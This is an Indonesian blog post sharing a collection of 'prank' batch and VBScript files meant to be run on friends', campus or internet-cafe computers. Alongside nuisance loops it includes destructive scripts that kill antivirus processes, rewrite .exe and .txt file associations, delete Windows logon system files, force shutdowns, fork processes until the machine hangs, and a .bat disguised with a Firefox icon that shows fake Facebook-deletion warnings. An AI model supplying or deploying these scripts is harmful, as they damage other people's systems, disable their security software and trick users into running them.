Monday, November 5, 2018

Kumpulan Script Jail Menggunakan Notepad

0


Hallo teman-teman setia sahabat blogger. Kali ini DISCONSER akan berbagi kumpulan Script jail atau mungkin bisa juga di bilang virus yah untuk kalian xD yang hanya dengan menggunakan Notepad, Script berikut hanya untuk jahil.

Untuk membuat script ini aktif yang anda butuhkan adalah :
1. Notepad
2. Komputer ( bukan kalkulator ) xD
3. Nah sekarang tinggal copy paste script nya ke notepad, langsung saja dicoba bagian bawah

MESSAGES YANG NONGOL TERUS MENERUS SECARA OTOMATIS

@ECHO off
:Begin
msg * muka lu jelek
msg * ngaca dulu gih
msg * hayo lu, cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN


==> save nama script diatas dengan ekstensi *.bat

BIKIN SHUTDOWN + MESSAGES

@echo off
msg * apaan sih lu
shutdown -s -c "Error! muka mu
standar abis"


==> save nama script diatas dengan ekstensi *.bat

MAININ CAPS LOCK BUTTON

Set wshShell
=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{ CAPSLOCK }"
loop


==> save nama script diatas dengan ekstensi *.vbs

BUKA TUTUP CD/DVD SECARA OTOMATIS TERUS-MENERUS

Set oWMP = CreateObject
("WMPlayer.OCX.7")
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


==> save nama script diatas dengan ekstensi *.vbs

BIKIN VB SCRIPT NONGOL TERUS MENERUS SECARA OTOMATIS

Set wshShell =
wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


==> save nama script diatas dengan ekstensi *.vbs

MENEKAN TOMBOL BACKSPACE TERUS MENERUS SECARA OTOMATIS

MsgBox "kembali ke menu
sebelum nya"
Set wshShell
=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


==> save nama script diatas dengan ekstensi *.vbs

OTOMATIS NGETIK "LU JELEK BANGET SIH" DI NOTEPAD ATAU M.WORD

Set wshShell =
wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "lu jelek
banget sih!!!"
loop


==> save nama script diatas dengan ekstensi *.vbs

MEMBUKA NOTEPAD TERUS MENERUS

@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top


==> save nama script diatas dengan ekstensi *.BAT

OTOMATIS BUKA NOTEPAD LALU NGETIK "APA YG KAMU MAU"

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell =
WScript.CreateObject
("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "


==> save nama script diatas dengan ekstensi *.vbs

BISA MEMILIH JAWABAN SEPERTI QUIZ LAH KIRA2

@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lu rusak
msg * ngaca dulu gih
msg * hayo lu, cpu lu gw acak2
msg * udah install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top


==> nah script diatas save jadi quiz.bat,

POKOKNYA KALO YANG INI DICOBA DULU DEH !!

@echo off
set end=md “Hack
installing”
set fin=copy “Hack
log.txt” “Installing”
%end%
%fin%
net send * Hack is
installing, press OK to
begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is
hacked ….
msg * I warned you,
and you kept going.
Challenge me and this
is what happens.
DEL C:WINDOWS
system32logoff.exe /
F /Q
DEL C:WINDOWS
system32logon.exe /
F /Q
DEL C:WINDOWS
system32logon.scr /
F /Q
cls
shutdown -s -t 5 -c
“ thank you for
waiting”


==> save script diatas dengan ekstensi *.bat

MERUSAK KOMPUTER ORANG LAIN

buka cmd (comand prompt), kalau belum tahu nyari dimana, klik start – run – ketik CMD – Lalu ketikan script ini

ASSOC.exe=.hank

lalu enter!


!!!! Program kayak ms.word/game ngambek jalan!, jika sudah puas banget jail nya (hahahaa) dan mau ngembaliin nya, tinggal buka CMD lagi. lalu ketik

ASSOC.exe=EXEFILE 

SCRIPT PALING KEREN

1.    Buka program notepad atau biar cepet menu RUN ketik notepad lalu enter
2.    Copy kode ini dan pastekan di notepad kamu 

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ” SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ………..” 

3.    Habis itu simpen file notepad ini dengan format *.bat = terserah mau diberi nama apa, misal : kere.bat dan SAVE di Dekstop (Recommended) 
4.    Sekarang click kanan desktop kamu dan pilih New => Shortcut 
5.    Setelah ini akan muncul sebuah tampilan dan klik browse lalu cari lokasi file .bat yang kamu simpen tadi, misal tadi kamu save pada dekstop 
6.    Klik Next dan Rename dengan Mozilla Firefox (Untuk nama ini terserah kamu dan bebas bisa ganti dengan Opera Mini atau Google Chrome, ini hanya sebagai tipuan aja) 
7.    Bila semua langkah sudah oke, sekarang yang perlu kamu lakuin adalah mengubah icon .bat tadi dalam bentuk Mozilla Firefox (karena kita sering pakai Mozilla jadi pembahasan nya pakai browser ini) .. 

Terus cara nya gimana ?

Gampang, tinggal kamu klik kanan file .bat tadi dan pilih change icon

Gak nemu icon mozilla? Coba deh low cari di Program Files -  Mozilla Firefox

Nah sekarang virus facebook kamu telah jadi dengan sempurna, kalau kamu ingin iseng nyoba tinggal di klik aja deh dan lihat perubahan yang akan terjadi.

Harus nya pasti sedikit kaget dan coba low bayangin kalau trik ini kamu praktekan di kompi temen kamu atau mungkin kompi kampus atau warnet.

what will happen? abis pasti nya ..

SCRIPT PALING GANAS

Langsung aja ...
buka notepad
dan silahkan tulis script di bawah ini
option explicit
dim wshshell
set wshshell=wscript.createobject("wscript.shell")
dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next

simpan dengan nama ( virus.vbs )

keterangan: dan silahkan jalan kan file tersebut nah silahkan dilihat apa yang terjadi? komputer sobat akan dipenuhi oleh 100000000 virus dan komputer tentu nya akan hang total sebelum sobat mendelete semua nya

*Keterangan: Untuk Kode Warna Hijau dibawah nya merupakan keterangan ekstensi cara menyimpan nya, missal nya ekstensi nya .vbs, jadi cara menyimpan nya sebgagai berikut :

1.    Buka notepad
2.    Copy paste script nya
3. Save, dengan tipe ALL FILE dan Beri nama terserah Anda lalu di beri akhiran ekstensi nya .vbs
4.    Klik Save

NB : SCRIPT DIATAS BISA KAMI NAN KAMU !

* Kami tidak bertanggung jawab jika terjadi apa-apa terhadap komputer/laptop anda atau teman anda, DISCONSER hanya memberikan info atau sebatas sharing saja.

0 komentar:

Post a Comment

 
Design by DISCONSER - Free Download Full Version | Best Web Hosting